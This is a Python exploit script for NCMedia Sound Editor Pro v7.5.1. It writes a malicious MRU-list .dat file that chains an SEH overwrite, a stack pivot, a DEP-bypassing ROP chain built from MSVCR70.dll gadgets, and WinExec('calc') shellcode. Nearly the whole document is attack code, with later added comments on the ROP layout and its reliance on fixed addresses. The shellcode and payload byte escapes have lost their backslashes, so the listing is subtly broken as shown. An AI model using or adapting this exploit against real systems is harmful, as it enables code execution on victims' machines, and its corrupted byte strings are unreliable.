
# Title : Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP
# Published : 2012-10-03
# Author :


#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP                          #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit)                  #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/     #
# Software: http://www.soundeditorpro.com/                                  #
# HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro           #
#        open -> click "File" menu -> calc ;))                              #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the        #
# ROP-Chain as it was executed was "Oh no, not again"!                      #
#---------------------------------------------------------------------------#

import sys, socket, struct 

# Name of the MRU-list data file the script writes next to itself.
# Note: this shadows Python 2's builtin file(); kept as-is because the
# write block below refers to this module-level name.
file = "MRUList201202.dat"

#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"...   #
#--------------------------------------------------------------------------------------------------------------#
# DEP bypass: a ROP chain assembled from MSVCR70.dll gadgets (the runtime the
# author notes ships with the product) that stages the register state for a
# VirtualProtect() call and fires it with the PUSHAD gadget in the last entry.
# Each struct.pack('<L', ...) appends one little-endian 32-bit value; the
# trailing comments give the gadget or the value's role, and the right-hand
# column groups the entries by the register they populate.
# Defender note: every address is hard-coded, so the chain only works if
# MSVCR70.dll (and SoundEditorPro.exe, for the JMP ESP) load at a predictable
# base. A bundled, non-randomized runtime is the enabling weakness here; an
# ASLR-enabled or rebased build of those modules would break the chain.
rop = struct.pack('<L',0x7c0126bc)  # XCHG EAX,EBP # ADD AL,7C # RETN                                           
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                             |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B                         | MOV VP -> ESI
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN                                  /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe]                        | JMP ESP -> EBP
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll]                                               |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN                                           /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes)                                                 | Executable Size -> EBX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                             |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN                                /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN                                                              ROP-NOP -> EDI
rop += struct.pack('<L',0x7c034e02) # ROP-NOP                                                                   /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40                                                                | newProtect -> EDX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                             |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN  /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN                                                              RW lpOldProtect -> ECX
rop += struct.pack('<L',0x7c049001) # lpOldProtect                                                              /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                              NOP padding -> EAX
rop += struct.pack('<L',0x90909090) # NOP                                                                       /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN                                  |  PUSHAD -> pwnd!!
#--------------------------------------------------------------------------------------------------------------#

#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
#----------------------------------
# WinExec("calc") shellcode, written as adjacent string literals inside
# parentheses (implicit concatenation). The in-line comments are the author's
# own walk-through of the stages.
# NOTE(review): every byte escape here reads "xNN" rather than "\xNN", so as
# this listing stands the literal is plain ASCII text, not the intended byte
# string -- it looks like the backslashes were dropped when the page was
# extracted. The same applies to the literals in the payload assembly below.
calc = (
"x31xD2"                      #
"x52"                          #
"x68x63x61x6Cx63"          # Stack has arguments for
"x89xE6"                      # WinExec -> calc
"x52"                          #
"x56"                          ########
"x64x8Bx72x30"              #
"x8Bx76x0C"                  #
"x8Bx76x0C"                  # Found Kernel32
"xAD"                          # base address
"x8Bx30"                      #
"x8Bx7Ex18"                  ########
"x8Bx5Fx3C"                  # Found export table offset
"x8Bx5Cx1Fx78"              ########
"x8Bx74x1Fx20"              # Found export names table
"x01xFE"                      ########
"x8Bx4Cx1Fx24"              # Found export ordinals table
"x01xF9"                      ########
"x42"                          #
"xAD"                          # Found WinExec ordinal
"x81x3Cx07x57x69x6Ex45"  #
"x75xF5"                      ########
"x0FxB7x54x51xFE"          #
"x8Bx74x1Fx1C"              #
"x01xFE"                      # Pop calc ;))
"x03x3Cx96"                  #
"xFFxD7")                     #

#----------------------------------
# badchars -> '\x00\x0d\x0a'
# 0x0040e02a {pivot 1092}  # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
# Payload layout (addresses per the note block above):
#   b00m = 10-byte NOP sled + the WinExec shellcode
#   poc  = 61 x ROP-NOP (0x7c034e02, little-endian)
#          + ROP chain + b00m
#          + 'A' padding so that everything before the trailer is 3880 bytes
#          + stack-pivot address 0x0040e02a (little-endian) as the trailer
# NOTE(review): as in the shellcode above, the escapes read "xNN" without the
# backslash, so in this listing these literals are ASCII text rather than the
# intended bytes.
b00m = "x90"*10 + calc
poc = "x02x4Ex03x7C"*61 + rop + b00m + "x41"*(3880-len(rop + b00m)) + "x2AxE0x40x00"

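# Write the assembled payload to the output file.
# 'file' and 'poc' are module-level names defined above.
try:
    print("[*] Creating exploit file...\n")
    # 'with' closes the handle even if write() raises; the original only
    # closed it on the success path.
    with open(file, "w") as writeFile:
        writeFile.write(poc)
    print("[*] File successfully created!")
except (IOError, OSError) as exc:
    # Catch only filesystem errors and report the cause: a bare except also
    # swallowed KeyboardInterrupt/SystemExit and hid why the write failed.
    print("[!] Error while creating file: %s" % exc)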